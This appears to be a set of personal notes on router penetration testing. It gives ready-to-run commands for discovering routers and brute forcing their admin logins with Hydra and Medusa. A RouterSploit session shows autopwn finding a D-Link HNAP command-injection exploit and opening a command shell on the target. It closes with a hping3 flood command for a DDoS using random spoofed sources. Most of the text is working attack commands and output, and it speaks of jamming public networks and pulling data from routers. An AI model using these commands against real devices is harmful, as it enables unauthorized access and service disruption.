ddos and route

1. Router Penetration Testing
2. ===========================
3.  
4. Router is the central connecting device, which provides the connectivity to all the end devices and nodes along with the network components of a particular network. Router Pentesting is a process in which a network auditor has seen cross check all the possible information gathering as well as exploitation methods as per the router. The goal of router pentesting is to know scope of network by identifying the total number of access points, MAC address of each router, model number of router, company name of router, firmware version.
5.  
6. There are two types of attacking procedures for that :
7.  
8. Active Router Attack : In this attack we try to attack directly on the Router’s IP which is 192.168.0.1 or 192.168.1.1 mostly and try to halt the services in the network and getting the juicy data out of the Router.
9. Eg. Credentials Brute force attack, Wifi Jammer etc. on Public Networks
10.  
11. Passive Router Attack: In this attack we do not engage the router in the process moreover we play with the broadcasted packets data generated by the router. The attack doesn’t goes directly to the Router but the attacker can use the data which is being originated from the or through the router and moving on.
12. Eg. Sniffing and Monitoring the WIFI Traffic, doing MITM and other things.
13.  
14. Attack Vectors
15. Information Gathering of the Router :
16. When connected to the network :
17. Terminal : route -n
18. Terminal : netdiscover -r 192.168.0.1/24
19. (This can be used for getting the MAC address of the router)
20. When we got the MAC address : https://www.macvendorlookup.com/ can be used for getting the Vendor Name.
21.  
22. How to find out more about Router Vendor : (When the MAC Address is spoofed)
23.  
24. Airmon-ng start wlan0
25. Airodump-ng -M --bssid -c wlan0mon. (Big Window)
26.  
27. -----------------------------------------------------------------
28.  
29. http://192-168-1-1ip.mobi/default-router-passwords-list/
30. http://www.routerpasswords.com/
31. https://www.bestvpn.com/default-router-login-details/
32.  
33. ---------------------------------------------------------------------
34.  
35. Brute Forcing on Default Credentials :
36. Default credentials are those which are not changed after the purchase of the Router itself, these are the Router Login page Credentials.
37. Mostly the Username goes with Admin only.
38.  
39. For Brute Forcing we are gonna using some advanced brute force tools which are pre-installed in Kali Linux.
40. Tools : Hydra, Medusa, Xhydra, Burpsuite
41.  
42. Attacking Methods:
43.  
44. Hydra : #hydra -l Admin -P /usr/share/wordlists/rockyou.txt 192.168.0.1 -m http-get
45.  
46. Here, -l : username, -P : Passwords, where we put a dictionary of credentials, Rockyou.txt , http-get / http-post : Way of transmission of data , 192.168.0.1 : Default Router's IP Address.
47.  
48. Medusa : #medusa -h 192.168.0.1 -u Admin -P <dictionary file> -M http
49.  
50. Here, -h : Target IP Address , -u : Username , -P : Password, here we can embed Dictionary if credentials, -M : Method of transmission
51.  
52.  
53. Routersploit Framework (RSF)
54. ========================
55. It is a tool written in python used for automating the process of router exploitation. This is not pre-installed in Kali Linux, so we have to get it from external sources.
56.  
57. Downloading Steps :
58. Installation on Kali Linux :
59. apt-get install python3-pip
60. git clone https://www.github.com/threat9/routersploit
61. cd routersploit
62. python3 -m pip install -r requirements.txt
63. python3 rsf.py
64.  
65. Running Steps :
66.  
67. When the Routersploit Framework is on,
68. rsf > help (For help Menu)
69. Global commands:
70. help - Print this help menu
71. use <module> - Select a module for usage
72. exec <shell command> <args> - Execute a command in a shell
73. search <search term> - Search for appropriate module
74. exit - Exit RouterSploit
75. rsf > use scanners/ (Using Scanners : Will show the list of every scanner)
76. scanners/2wire_scan
77. scanners/billion_scan
78. scanners/huawei_scan
79. scanners/netcore_scan
80. scanners/tplink_scan
81. scanners/3com_scan
82. scanners/cameras_scan
83. scanners/ipfire_scan
84. scanners/netgear_scan
85. scanners/ubiquiti_scan
86. scanners/asmax_scan
87. scanners/cisco_scan
88. scanners/juniper_scan
89. scanners/netsys_scan
90. scanners/zte_scan
91. scanners/asus_scan
92. scanners/comtrend_scan
93. scanners/linksys_scan
94. scanners/routers_scan
95. scanners/zyxel_scan
96. scanners/autopwn
97. scanners/dlink_scan
98. scanners/misc_scan
99. scanners/shuttle_scan
100. scanners/belkin_scan
101. scanners/fortinet_scan
102. scanners/movistar_scan
103. scanners/technicolor_scan
104. scanners/bhu_scan
105. scanners/grandstream_scan
106. scanners/multi_scan
107. scanners/thomson_scan
108. rsf > use scanners/autopwn (using autoseatch)
109. rsf (AutoPwn) > show options
110.  
111. Target options:
112.  
113. Name Current settings Description
114. ---- ---------------- -----------
115. target Target IP address e.g. 192.168.1.1
116. port 80 Target port
117.  
118.  
119. Module options:
120.  
121. Name Current settings Description
122. ---- ---------------- -----------
123. threads 8 Number of threads
124.  
125.  
126. rsf (AutoPwn) >
127.  
128. rsf (AutoPwn) > set target 192.168.0.1
129. [+] {'target': '192.168.0.1'}
130. rsf (AutoPwn) > show options
131.  
132. Target options:
133.  
134. Name Current settings Description
135. ---- ---------------- -----------
136. target 192.168.0.1 Target IP address e.g. 192.168.1.1
137. port 80 Target port
138.  
139.  
140. Module options:
141.  
142. Name Current settings Description
143. ---- ---------------- -----------
144. threads 8 Number of threads
145.  
146.  
147. rsf (AutoPwn) >
148.  
149.  
150. [*] Could not verify exploitability:
151. - exploits/routers/dlink/dsl_2740r_dns_change
152. - exploits/routers/dlink/dir_815_850l_rce
153. - exploits/routers/dlink/dsl_2640b_dns_change
154. - exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
155. - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
156. - exploits/routers/shuttle/915wm_dns_change
157. - exploits/routers/billion/5200w_rce
158. - exploits/routers/cisco/catalyst_2960_rocem
159. - exploits/routers/cisco/secure_acs_bypass
160.  
161. [+] Device is vulnerable:
162. - exploits/routers/dlink/multi_hnap_rce
163.  
164. rsf (AutoPwn) > use exploits/routers/dlink/multi_hnap_rce
165. rsf (D-Link Multi HNAP RCE) > show options
166.  
167. Target options:
168.  
169. Name Current settings Description
170. ---- ---------------- -----------
171. target Target address e.g. http://192.168.1.1
172. port 80 Target Port
173.  
174.  
175. rsf (D-Link Multi HNAP RCE) > set target 192.168.0.1
176. [+] {'target': '192.168.0.1'}
177. rsf (D-Link Multi HNAP RCE) > show options
178.  
179. Target options:
180.  
181. Name Current settings Description
182. ---- ---------------- -----------
183. target http://192.168.0.1 Target address e.g. http://192.168.1.1
184. port 80 Target Port
185.  
186.  
187. rsf (D-Link Multi HNAP RCE) >
188. rsf (D-Link Multi HNAP RCE) > run
189. [*] Running module...
190. [*] Target might be vulnerable - it is hard to verify
191. [*] Invoking command loop...
192. [*] It is blind command injection, response is not available
193.  
194. [+] Welcome to cmd. Commands are sent to the target via the execute method.
195. [*] Depending on the vulnerability, command's results might not be available.
196. [*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
197.  
198. -----------------------------------------------------------------
199.  
200.  
201. DDOS
202.  
203. hping3 192.168.195.183 -c 100000000000 -d 999999999 --rand-source --flood -p 3306